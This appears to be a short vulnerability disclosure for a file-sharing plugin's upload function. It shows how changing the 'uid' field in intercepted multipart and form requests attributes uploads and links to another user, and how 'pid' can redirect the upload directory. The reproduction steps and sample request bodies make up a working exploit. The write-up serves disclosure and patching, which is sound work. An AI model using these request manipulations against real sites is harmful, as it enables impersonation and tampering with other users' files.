Description The plugin is missing validation in its upload function, allowing a user to manipulate the user_id
to make it appear that a file was uploaded by another user
1. Select to upload a file through the plugin
2. Intercept the request:
Example:
```
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="file[]"; filename="IMG_0628.PNG"
Content-Type: image/png
...
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="action"
sp_file_upload_callback
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
Content-Disposition: form-data; name="uid"
2(CHANGE HERE)
------WebKitFormBoundaryX4YnPgSA4oPHlNjv
```
Modify the `2(CHANGE HERE)` value and send the request.
Modify the next request body changing `2(CHANGE HERE)` to any user ID:
```
pid=2&action=sp_cdm_link_save_embed&uid=2(CHANGE HERE)&link-name=link1&link-url=http%3A%2F%2Flocalhost%3A8020%2Flink1&dlg-upload-notes=aaa
```
Note: the upload directory can also be manipulated by changing the `pid`